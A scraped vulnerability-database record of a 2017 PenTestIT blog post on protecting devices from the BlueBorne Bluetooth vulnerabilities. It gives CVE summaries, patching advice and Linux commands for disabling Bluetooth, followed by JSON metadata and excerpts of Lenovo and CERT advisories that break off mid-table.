ID PENTESTIT:4BD75D96F8359A3C04C87CDD1210FFCF Type pentestit Reporter Black Modified 2017-09-14T21:22:24
Description
PenTestIT RSS Feed
No matter what part of the world you live in, I'm sure that you must have at least heard about the latest Bluetooth attack making rounds - BlueBorne. I'm also sure that if you have a vulnerable device and you have some time until your vendor releases a patch remediating this vulnerability. If this is the case, then this post is for you as this post discusses the different ways which you can perform to try and avoid being exploited with the BlueBorne Bluetooth vulnerability.
What is BlueBorne?
BlueBorne is a new, unauthenticated, set of vulnerabilities targetting multiple operating systems such as Android, iOS, Windows, and Linux, and the devices that have these operating systems installed. The name is concocted on the word ‘airborne’ as it allows unauthenticated attackers to take over devices on air-gapped networks. Additionally, this set of attacks do not require the targeted device to be set on discoverable mode or to be paired to the attacker’s device. More information about these set of vulnerabilities can be found here.
Vulnerabilities that make up BlueBorne:
CVE-2017-0781: Remote code execution vulnerability affecting Android devices prior to September 9, 2017 Security Patch level
Due to a faulty implementation of the Bluetooth Network Encapsulation Protocol (BNEP) service, a heap overflow occurs when an incorrect buffer size passed to a memcpy call. This condition allows you to execute arbitrary code and the vulnerability does not require any user interaction, authentication or pairing.
CVE-2017-0782: Remote code execution vulnerability affecting Android devices prior to September 9, 2017 Security Patch level
A integer underflow condition exists while processing packets by the bnep_process_control_packet(). This memory corruption can be triggered in the Personal Area Networking (PAN) profile of BNEP service and allows you to execute arbitrary. The vulnerability does not require any user interaction, authentication or pairing.
CVE-2017-0783: A vulnerability in the PAN profile of the Bluetooth stack enables the attacker to create a network interface on the victim’s device and transmit all communication over this network interface aka man-in-the-middle. This affects all Android devices prior to September 9, 2017 Security Patch level.
CVE-2017-0785: SDP (Service Discovery Protocol) server, enables a device to identify other Bluetooth services in its range. An attacker can send crafted request packets to the target, this causes it to disclose memory bits in response packets.
CVE-2017-8628: Similar to CVE-2017-0783, this affects all versions of Microsoft Windows from Windows Vista to Windows 10.
CVE-2017-1000250: Information leak vulnerability in the BlueZ implementation for Linux. The SDP server discloses memory bit in response packets when it receives a special crafted packet from an attacker.
CVE-2017-1000251: A memory corruption exists because of a stack overflow vulnerability in the L2CAP (Logical Link Control and Adaptation Protocol), again in BlueZ for Linux.
CVE-2017-14315: Remote code execution via Apple’s Low Energy Audio Protocol (LEAP) affecting Apple iOS versions 9.3.5 and lower, and AppleTV tvOS versions 7.2.2 and lower
An overly large audio command sent to a targeted device causes a heap overflow due to improper validation of the received command.
With this theory about BlueBorne out of the way, let's get to the crux of this post.
If you are not able to do so, you can deactivate the Bluetooth module itself. The best way to protect your Windows systems from BlueBorne attacks is by disabling the Bluetooth device from the Device Manager.
Android: If you are lucky enough you will have a supported phone which can get OTAs from your provider and upgrade to the latest September 9, 2017 Security Patch Level. If not, you always have an option of sideloading an OTA. Unfortunately, this patch will be available only for Nougat (7.0), Marshmallow (6.0). You also have an option of getting on a custom ROM such as LineageOS.
Apple: Upgrade to iOS version 10 and Apple TV versions above 7.2.2.R
*NIX: This is a bit tricky as some vendors have already released a patch and some have not. For example, RHEL and Debian CVE-2017-1000250 and CVE-2017-1000251 are already available. However, if you still want to disable Bluetooth, this is how:
Ubuntu/Debian:
#Disable and stop the Bluetooth service
systemctl disable bluetooth.service
systemctl mask bluetooth.service
systemctl stop bluetooth.service
#Remove Bluetooth modules
rmmod bnep
rmmod bluetooth
rmmod btusb
You can even follow the RHEL SCAP Security Guide here.
5. Armis Labs have also released an Android App “BlueBorne Vulnerability Scanner” to detect devices that are vulnerable to BlueBorne.
{"cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://pentestit.com/protect-systems-blueborne-attacks/", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "PENTESTIT:4BD75D96F8359A3C04C87CDD1210FFCF", "history": [{"lastseen": "2017-09-14T22:24:30", "differentElements": ["cvss"], "edition": 1, "bulletin": {"cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://pentestit.com/protect-systems-blueborne-attacks/", "id": "PENTESTIT:4BD75D96F8359A3C04C87CDD1210FFCF", "history": [], "modified": "2017-09-14T21:22:24", "type": "pentestit", "description": "PenTestIT RSS Feed\n\nNo matter what part of the world you live in, I'm sure that you must have at least heard about the latest Bluetooth attack making rounds - **BlueBorne**. I'm also sure that if you have a vulnerable device and you have some time until your vendor releases a patch remediating this vulnerability. If this is the case, then this post is for you as this post discusses the different ways which you can perform to try and avoid being exploited with the BlueBorne Bluetooth vulnerability.\n\n\n\n## What is BlueBorne?\n\nBlueBorne is a new, unauthenticated, set of vulnerabilities targetting multiple operating systems such as Android, iOS, Windows, and Linux, and the devices that have these operating systems installed. The name is concocted on the word \u2018airborne\u2019 as it allows unauthenticated attackers to take over devices on air-gapped networks. Additionally, this set of attacks do not require the targeted device to be set on discoverable mode or to be paired to the attacker\u2019s device. More information about these set of vulnerabilities can be found [here](<https://www.armis.com/blueborne/>).\n\n## Vulnerabilities that make up BlueBorne:\n\n * **CVE-2017-0781**: Remote code execution vulnerability affecting Android devices prior to September 9, 2017 Security Patch level \nDue to a faulty implementation of the Bluetooth Network Encapsulation Protocol (BNEP) service, a heap overflow occurs when an incorrect buffer size passed to a memcpy call. This condition allows you to execute arbitrary code and the vulnerability does not require any user interaction, authentication or pairing.\n * **CVE-2017-0782**: Remote code execution vulnerability affecting Android devices prior to September 9, 2017 Security Patch level \nA integer underflow condition exists while processing packets by the `bnep_process_control_packet()`. This memory corruption can be triggered in the Personal Area Networking (PAN) profile of BNEP service and allows you to execute arbitrary. The vulnerability does not require any user interaction, authentication or pairing.\n * **CVE-2017-0783**: A vulnerability in the PAN profile of the Bluetooth stack enables the attacker to create a network interface on the victim\u2019s device and transmit all communication over this network interface aka [man-in-the-middle](<http://pentestit.com/tag/man-in-the-middle/>). This affects all Android devices prior to September 9, 2017 Security Patch level.\n * **CVE-2017-0785**: SDP (Service Discovery Protocol) server, enables a device to identify other Bluetooth services in its range. An attacker can send crafted request packets to the target, this causes it to disclose memory bits in response packets.\n * **CVE-2017-8628:** Similar to CVE-2017-0783, this affects all versions of [Microsoft Windows](<http://pentestit.com/tag/microsoft-windows/>) from Windows Vista to Windows 10.\n * **CVE-2017-1000250**: Information leak vulnerability in the BlueZ implementation for Linux. The SDP server discloses memory bit in response packets when it receives a special crafted packet from an attacker.\n * **CVE-2017-1000251**: A memory corruption exists because of a stack overflow vulnerability in the L2CAP (Logical Link Control and Adaptation Protocol), again in BlueZ for Linux.\n * **CVE-2017-14315**: Remote code execution via Apple\u2019s Low Energy Audio Protocol (LEAP) affecting Apple iOS versions 9.3.5 and lower, and AppleTV tvOS versions 7.2.2 and lower \nAn overly large audio command sent to a targeted device causes a heap overflow due to improper validation of the received command.\n\nWith this theory about _BlueBorne_ out of the way, let's get to the crux of this post.\n\n## How to protect systems from BlueBorne attacks?\n\n 1. Microsoft Windows: Apply patches listed in the September 2017 advisory - [CVE-2017-8628 | Microsoft Bluetooth Driver Spoofing Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)\n * If you are not able to do so, you can deactivate the Bluetooth module itself. The best way to protect your Windows systems from BlueBorne attacks is by disabling the Bluetooth device from the Device Manager.\n 2. Android: If you are lucky enough you will have a supported phone which can get OTAs from your provider and upgrade to the latest [September 9, 2017 Security Patch Level](<https://source.android.com/security/bulletin/2017-09-01>). If not, you always have an option of [sideloading an OTA](<https://developers.google.com/android/ota>). Unfortunately, this patch will be available only for Nougat (7.0), Marshmallow (6.0). You also have an option of getting on a custom ROM such as [LineageOS](<https://review.lineageos.org/#/c/189415/>).\n 3. Apple: Upgrade to iOS version 10 and Apple TV versions above 7.2.2.R\n 4. *NIX: This is a bit tricky as some vendors have already released a patch and some have not. For example, [RHEL](<https://access.redhat.com/security/vulnerabilities/blueborne>) and [Debian CVE-2017-1000250](<https://security-tracker.debian.org/tracker/CVE-2017-1000250>) and [CVE-2017-1000251](<https://security-tracker.debian.org/tracker/CVE-2017-1000251>) are already available. However, if you still want to disable Bluetooth, this is how: \nUbuntu/Debian:\n \n sudo mv /etc/init/bluetooth.conf /etc/init/bluetooth.conf.disabled\n\nRun:\n \n #Disable and stop the Bluetooth service\n systemctl disable bluetooth.service\n systemctl mask bluetooth.service\n systemctl stop bluetooth.service\n #Remove Bluetooth modules\n rmmod bnep\n rmmod bluetooth\n rmmod btusb\n\nYou can even follow the RHEL SCAP Security Guide [here](<https://github.com/OpenSCAP/scap-security-guide/blob/master/RHEL/7/templates/static/bash/service_bluetooth_disabled.sh>).\n 5. Armis Labs have also released an Android [App](<https://play.google.com/store/apps/details?id=com.armis.blueborne_detector&hl=en>) \u201cBlueBorne Vulnerability Scanner\u201d to detect devices that are vulnerable to BlueBorne.\n\nThe post [How to: Protect Systems From BlueBorne Attacks?](<http://pentestit.com/protect-systems-blueborne-attacks/>) appeared first on [PenTestIT](<http://pentestit.com>).", "published": "2017-09-14T21:22:24", "cvelist": ["CVE-2017-0781", "CVE-2017-0782", "CVE-2017-0783", "CVE-2017-0785", "CVE-2017-1000250", "CVE-2017-1000251", "CVE-2017-14315", "CVE-2017-8628"], "title": "How to: Protect Systems From BlueBorne Attacks?", "lastseen": "2017-09-14T22:24:30", "viewCount": 665, "enchantments": {}, "reporter": "Black", "bulletinFamily": "blog", "objectVersion": "1.4", "references": []}}], "modified": "2017-09-14T21:22:24", "lastseen": "2017-09-19T10:19:42", "published": "2017-09-14T21:22:24", "description": "PenTestIT RSS Feed\n\nNo matter what part of the world you live in, I'm sure that you must have at least heard about the latest Bluetooth attack making rounds - **BlueBorne**. I'm also sure that if you have a vulnerable device and you have some time until your vendor releases a patch remediating this vulnerability. If this is the case, then this post is for you as this post discusses the different ways which you can perform to try and avoid being exploited with the BlueBorne Bluetooth vulnerability.\n\n\n\n## What is BlueBorne?\n\nBlueBorne is a new, unauthenticated, set of vulnerabilities targetting multiple operating systems such as Android, iOS, Windows, and Linux, and the devices that have these operating systems installed. The name is concocted on the word \u2018airborne\u2019 as it allows unauthenticated attackers to take over devices on air-gapped networks. Additionally, this set of attacks do not require the targeted device to be set on discoverable mode or to be paired to the attacker\u2019s device. More information about these set of vulnerabilities can be found [here](<https://www.armis.com/blueborne/>).\n\n## Vulnerabilities that make up BlueBorne:\n\n * **CVE-2017-0781**: Remote code execution vulnerability affecting Android devices prior to September 9, 2017 Security Patch level \nDue to a faulty implementation of the Bluetooth Network Encapsulation Protocol (BNEP) service, a heap overflow occurs when an incorrect buffer size passed to a memcpy call. This condition allows you to execute arbitrary code and the vulnerability does not require any user interaction, authentication or pairing.\n * **CVE-2017-0782**: Remote code execution vulnerability affecting Android devices prior to September 9, 2017 Security Patch level \nA integer underflow condition exists while processing packets by the `bnep_process_control_packet()`. This memory corruption can be triggered in the Personal Area Networking (PAN) profile of BNEP service and allows you to execute arbitrary. The vulnerability does not require any user interaction, authentication or pairing.\n * **CVE-2017-0783**: A vulnerability in the PAN profile of the Bluetooth stack enables the attacker to create a network interface on the victim\u2019s device and transmit all communication over this network interface aka [man-in-the-middle](<http://pentestit.com/tag/man-in-the-middle/>). This affects all Android devices prior to September 9, 2017 Security Patch level.\n * **CVE-2017-0785**: SDP (Service Discovery Protocol) server, enables a device to identify other Bluetooth services in its range. An attacker can send crafted request packets to the target, this causes it to disclose memory bits in response packets.\n * **CVE-2017-8628:** Similar to CVE-2017-0783, this affects all versions of [Microsoft Windows](<http://pentestit.com/tag/microsoft-windows/>) from Windows Vista to Windows 10.\n * **CVE-2017-1000250**: Information leak vulnerability in the BlueZ implementation for Linux. The SDP server discloses memory bit in response packets when it receives a special crafted packet from an attacker.\n * **CVE-2017-1000251**: A memory corruption exists because of a stack overflow vulnerability in the L2CAP (Logical Link Control and Adaptation Protocol), again in BlueZ for Linux.\n * **CVE-2017-14315**: Remote code execution via Apple\u2019s Low Energy Audio Protocol (LEAP) affecting Apple iOS versions 9.3.5 and lower, and AppleTV tvOS versions 7.2.2 and lower \nAn overly large audio command sent to a targeted device causes a heap overflow due to improper validation of the received command.\n\nWith this theory about _BlueBorne_ out of the way, let's get to the crux of this post.\n\n## How to protect systems from BlueBorne attacks?\n\n 1. Microsoft Windows: Apply patches listed in the September 2017 advisory - [CVE-2017-8628 | Microsoft Bluetooth Driver Spoofing Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)\n * If you are not able to do so, you can deactivate the Bluetooth module itself. The best way to protect your Windows systems from BlueBorne attacks is by disabling the Bluetooth device from the Device Manager.\n 2. Android: If you are lucky enough you will have a supported phone which can get OTAs from your provider and upgrade to the latest [September 9, 2017 Security Patch Level](<https://source.android.com/security/bulletin/2017-09-01>). If not, you always have an option of [sideloading an OTA](<https://developers.google.com/android/ota>). Unfortunately, this patch will be available only for Nougat (7.0), Marshmallow (6.0). You also have an option of getting on a custom ROM such as [LineageOS](<https://review.lineageos.org/#/c/189415/>).\n 3. Apple: Upgrade to iOS version 10 and Apple TV versions above 7.2.2.R\n 4. *NIX: This is a bit tricky as some vendors have already released a patch and some have not. For example, [RHEL](<https://access.redhat.com/security/vulnerabilities/blueborne>) and [Debian CVE-2017-1000250](<https://security-tracker.debian.org/tracker/CVE-2017-1000250>) and [CVE-2017-1000251](<https://security-tracker.debian.org/tracker/CVE-2017-1000251>) are already available. However, if you still want to disable Bluetooth, this is how: \nUbuntu/Debian:\n \n sudo mv /etc/init/bluetooth.conf /etc/init/bluetooth.conf.disabled\n\nRun:\n \n #Disable and stop the Bluetooth service\n systemctl disable bluetooth.service\n systemctl mask bluetooth.service\n systemctl stop bluetooth.service\n #Remove Bluetooth modules\n rmmod bnep\n rmmod bluetooth\n rmmod btusb\n\nYou can even follow the RHEL SCAP Security Guide [here](<https://github.com/OpenSCAP/scap-security-guide/blob/master/RHEL/7/templates/static/bash/service_bluetooth_disabled.sh>).\n 5. Armis Labs have also released an Android [App](<https://play.google.com/store/apps/details?id=com.armis.blueborne_detector&hl=en>) \u201cBlueBorne Vulnerability Scanner\u201d to detect devices that are vulnerable to BlueBorne.\n\nThe post [How to: Protect Systems From BlueBorne Attacks?](<http://pentestit.com/protect-systems-blueborne-attacks/>) appeared first on [PenTestIT](<http://pentestit.com>).", "title": "How to: Protect Systems From BlueBorne Attacks?", "cvelist": ["CVE-2017-0781", "CVE-2017-0782", "CVE-2017-0783", "CVE-2017-0785", "CVE-2017-1000250", "CVE-2017-1000251", "CVE-2017-14315", "CVE-2017-8628"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 1331, "enchantments": {"score": {"value": 8.2, "vector": "NONE", "modified": "2017-09-19T10:19:42"}, "dependencies": {"references": [{"type": "lenovo", "idList": ["LENOVO:PS500141-NOSID"]}, {"type": "cert", "idList": ["VU:240311"]}, {"type": "cve", "idList": ["CVE-2017-14315", "CVE-2017-1000250", "CVE-2017-1000251", "CVE-2017-8628", "CVE-2017-0785", "CVE-2017-0781", "CVE-2017-0783", "CVE-2017-0782"]}, {"type": "myhack58", "idList": ["MYHACK58:62201789258", "MYHACK58:62201789526", "MYHACK58:62201789277"]}, {"type": "seebug", "idList": ["SSV:96868", "SSV:96467"]}, {"type": "threatpost", "idList": ["THREATPOST:73E805ED92B364393EDD601647FE122D"]}, {"type": "thn", "idList": ["THN:649BE2C710B04C213ECB85D95D5F229A", "THN:4141386ABD9B9D1290E4A6EAD271B02B"]}, {"type": "f5", "idList": ["F5:K63131370"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20171018-01-BLUEBORNE"]}, {"type": "symantec", "idList": ["SMNTC-100744"]}, {"type": "nessus", "idList": ["APPLETV_BLUEBORNE.NASL", "VIRTUOZZO_VZLSA-2017-2685.NASL", "CENTOS_RHSA-2017-2685.NASL", "SL_20170912_BLUEZ_ON_SL6_X.NASL", "DEBIAN_DLA-1103.NASL", "FEDORA_2017-77F991E537.NASL", "DEBIAN_DSA-3972.NASL", "SLACKWARE_SSA_2017-258-01.NASL", "FEDORA_2017-FE95A5B88B.NASL", "UBUNTU_USN-3413-1.NASL"]}, {"type": "ubuntu", "idList": ["USN-3413-1", "USN-3423-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310882767", "OPENVAS:1361412562310882765", "OPENVAS:1361412562310873368", "OPENVAS:1361412562310811768", "OPENVAS:1361412562310703972", "OPENVAS:1361412562310843301", "OPENVAS:1361412562310891103", "OPENVAS:1361412562310811675", "OPENVAS:1361412562310811769", "OPENVAS:1361412562310882768"]}, {"type": "centos", "idList": ["CESA-2017:2685", "CESA-2017:2679", "CESA-2017:2681"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3972-1:ACF5D", "DEBIAN:DLA-1103-1:B4D85"]}, {"type": "redhat", "idList": ["RHSA-2017:2685", "RHSA-2017:2679", "RHSA-2017:2683", "RHSA-2017:2705", "RHSA-2017:2706", "RHSA-2017:2681", "RHSA-2017:2680", "RHSA-2017:2704", "RHSA-2017:2682", "RHSA-2017:2707"]}, {"type": "slackware", "idList": ["SSA-2017-258-01", "SSA-2017-258-02"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-2685", "ELSA-2017-2679-1", "ELSA-2017-3620", "ELSA-2017-2681", "ELSA-2017-2679"]}, {"type": "exploitdb", "idList": ["EDB-ID:44555", "EDB-ID:42762"]}, {"type": "zdt", "idList": ["1337DAY-ID-30273"]}, {"type": "suse", "idList": ["SUSE-SU-2017:2523-1", "SUSE-SU-2017:2534-1", "SUSE-SU-2017:2521-1", "SUSE-SU-2017:2459-1", "SUSE-SU-2017:2794-1", "SUSE-SU-2017:2548-1"]}], "modified": "2017-09-19T10:19:42"}, "vulnersScore": 8.2}, "reporter": "Black", "bulletinFamily": "blog", "objectVersion": "1.4", "type": "pentestit"}
{"lenovo": [{"lastseen": "2019-01-23T11:50:48", "bulletinFamily": "info", "description": "**Lenovo Security Advisory**: LEN-17125\n\n**Potential Impact**: Remote code execution\n\n**Severity**: High\n\n**Scope of Impact**: Industry wide\n\n**CVE Identifier**: CVE-2017-0781, CVE-2017-0782, CVE-2017-0783, CVE-2017-0785, CVE-2017-8628, CVE-2017-14315, CVE-2017-1000250, CVE-2017-1000251\n\n**Summary Description**:\n\nA collection of Bluetooth implementation vulnerabilities known as \"BlueBorne\" have been identified that affect Windows, iOS, and Linux-kernel-based operating systems. In worst case scenarios, these vulnerabilities allow an unauthenticated attacker to perform commands on affected devices.\n\n**Mitigation Strategy for Consumers (what you should do to protect yourself):**\n\nPatches are available in the latest patch releases from Windows (see [Microsoft bulletin](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)), iOS, Linux providers, and Android (see [September 2017 security bulletin](<https://source.android.com/security/bulletin/2017-09-01>)).\n\nU.S.-based phone and other mobile device users running Android are advised to regularly check this advisory page. Due to the complexity of the U.S. mobile ecosystem, which typically requires manufacturer and carrier support to push updates, updates are in progress. Users are encouraged to accept updates to their Android device upon receiving notifications to update their operating system.\n\n \nIf an update is not available, affected users should consider disabling Bluetooth on affected devices if Bluetooth is unused or unnecessary.\n\n**Product Impact**:\n", "modified": "2018-07-19T12:31:05", "published": "2018-07-19T12:31:00", "id": "LENOVO:PS500141-NOSID", "href": "https://support.lenovo.com/us/en/product_security/len-17125", "title": "Bluetooth \u201cBlueBorne\u201d Vulnerabilities - NL", "type": "lenovo", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2019-05-29T20:42:42", "bulletinFamily": "info", "description": "### Overview \n\nA collection of Bluetooth implementation vulnerabilities known as \"BlueBorne\" has been released. These vulnerabilities collectively affect Windows, iOS, and Linux-kernel-based operating systems including Android and Tizen, and may in worst case allow an unauthenticated attacker to perform commands on the device.\n\n### Description \n\nThe following vulnerabilities have been identified in various Bluetooth implementations:\n\n1\\. [**CWE-120**](<http://cwe.mitre.org/data/definitions/120.html>)**: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')** \\- CVE-2017-1000251 \n \nLinux kernel versions from 3.3-rc1 to present contain a vulnerable implementation of L2CAP EFS within the BlueZ module. The l2cap_parse_conf_rsp function does not properly check then length of the rsp argument prior to unpacking, allowing an attacker to overflow a 64 byte buffer on the kernel stack with an unlimited amount of data crafted to conform to a valid L2CAP response. \n \n2\\. [**CWE-125**](<http://cwe.mitre.org/data/definitions/125.html>)**: Out-of-bounds Read** \\- CVE-2017-1000250 \n \nAll versions of BlueZ for Linux contains a vulnerable implementation of SDP. An attacker may be able to control the continuation state within SDP request packets and cause the SDP server to return an out of bounds read from the response buffer. \n \n3\\. [**CWE-125**](<http://cwe.mitre.org/data/definitions/125.html>)**: Out-of-bounds Read** \\- CVE-2017-0785 \n \nAll versions of Android prior to September 9, 2017 Security Patch level contain a vulnerable implementation of SDP within the Android Bluetooth software stack. An attacker may be able to control the continuation state within SDP request packets and cause the SDP server to return an out of bounds read from the response buffer. While a similar flaw to CVE-2017-1000250, this is a distinct vulnerability in a different software stack. \n \n4\\. [**CWE-122**](<http://cwe.mitre.org/data/definitions/122.html>)**: Heap-based Buffer Overflow** \\- CVE-2017-0781 \n \nIn all versions of Android prior to September 9, 2017 Security Patch level, an incorrect buffer size passed to a memcpy call within the BNEP implementation for Android may allow an attacker to send crafted packets to the device that overflow the heap. \n \n5\\. [**CWE-191**](<http://cwe.mitre.org/data/definitions/191.html>)**: Integer Underflow (Wrap or Wraparound)** \\- CVE-2017-0782 \n \nIn all versions of Android prior to September 9, 2017 Security Patch level, the bnep_process_control_packet function of the BNEP implementation for Android does not properly check the size of rem_len before decrementing, allowing integer underflow and further unsafe processing of attacker-controlled packets. \n \n6\\. [**CWE-122**](<http://cwe.mitre.org/data/definitions/122.html>)**: Heap-based Buffer Overflow**\\- CVE-2017-14315 \n \nApple's Bluetooth Low-Energy Audio Protocol (LEAP) implementation in iOS version 9.3.5 and lower, and AppleTV tvOS version 7.2.2 and lower, does not properly validate the CID for incoming Bluetooth LEAP audio data, which may result in a heap overflow by not properly validating packet size before calling memcpy. An attacker sending \"classic\" (non-low-energy) Bluetooth packets may be able to cause multiple heap overflows resulting in code execution with the Bluetooth stack context. \n \n7 and 8. [**CWE-300**](<http://cwe.mitre.org/data/definitions/300.html>)**: Channel Accessible by Non-Endpoint ('Man-in-the-Middle')** \\- CVE-2017-0783 and CVE-2017-8628 \n \nIncorrect \"Security Level\" requirements in the PAN profile of the Bluetooth implementation may allow an attacker to gain permissions to perform man in the middle attacks on the user. CVE-2017-0783 applies to all versions of Android prior to the September 9, 2017, Security Patch Level, while CVE-2017-8628 applies to a similar flaw in all versions of Windows from Windows Vista to Windows 10. \n \nFor more details, please read [Armis's BlueBorne disclosure website](<https://www.armis.com/blueborne/#/technical>) and Technical White Paper. \n \n--- \n \n### Impact \n\nAn unauthenticated, remote attacker may be able to obtain private information about the device or user, or execute arbitrary code on the device. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nPatches are available in the latest releases of Windows (see [Microsoft bulletin](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)), iOS, the Linux kernel, and Android (see [September 2017 security bulletin](<https://source.android.com/security/bulletin/2017-09-01>)). \n \nCheck with your device manufacturer to determine if firmware updates will be available. \n \nPhones and other mobile devices in the US running Android are likely to see delayed updates, or possibly never receive updates, due to the complexity of the US mobile ecosystem which typically requires manufacturer and carrier support to push updates. \n \nIf an update is not available, affected users should consider the following workaround \n \n--- \n \n**Disable Bluetooth on your device** \n \nAffected users should consider disabling Bluetooth on affected devices if Bluetooth is unused or unnecessary. \n \n--- \n \n### Vendor Information\n\n240311\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Android Open Source Project\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Apple\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ BlackBerry\n\nNotified: September 18, 2017 Updated: September 19, 2017 \n\n**Statement Date: September 19, 2017**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nFrom the BlackBerry [security notice](<http://support.blackberry.com/kb/articleDetail?articleNumber=000045807&language=en_US>):\n\n\"BlackBerry recommends that all users of BlackBerry powered by Android smartphones should update to the September Security Maintenance release as soon as it is available. \n\nThere is no action necessary for users of BlackBerry 10 or BlackBerry OS smartphones. \n\nBlackBerry recommends keeping server and device operating systems up to date. \n\nQNX customers should contact their Bluetooth stack vendor for guidance.\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://support.blackberry.com/kb/articleDetail?articleNumber=000045807&language=en_US](<http://support.blackberry.com/kb/articleDetail?articleNumber=000045807&language=en_US>)\n\n### __ Google\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ Lenovo\n\nNotified: September 12, 2017 Updated: September 19, 2017 \n\n**Statement Date: September 19, 2017**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nSome Lenovo products are affected; patches are available. Users are encouraged to check [Lenovo Security Advisory LEN-17125](<https://support.lenovo.com/us/en/product_security/LEN-17125>) for details.\n\n### Vendor References\n\n * <https://support.lenovo.com/us/en/product_security/LEN-17125>\n\n### __ __ Microsoft Corporation\n\nNotified: September 12, 2017 Updated: September 13, 2017 \n\n**Statement Date: September 12, 2017**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n`Microsoft released security updates on July 11, 2017, and customers who have Windows Update enabled and applied the security updates, are protected automatically.`\n\n### Vendor Information\n\n[`CVE-2017-8628`](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)` describes this vulnerability in affected Microsoft products.`\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>\n\n### __ Samsung Mobile\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Tizen\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ Technicolor\n\nUpdated: November 08, 2017 \n\n**Statement Date: October 18, 2017**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nTechnicolor products are unaffected since most of them do not provide Bluetooth capacity.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Amazon\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Barnes and Noble\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ HTC\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Huawei Technologies\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Kyocera Communications\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ LG Electronics\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Motorola, Inc.\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Sony Corporation\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Xiaomi\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\nView all 18 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.9 | AV:A/AC:M/Au:N/C:C/I:C/A:C \nTemporal | 6.2 | E:POC/RL:OF/RC:C \nEnvironmental | 6.2 | 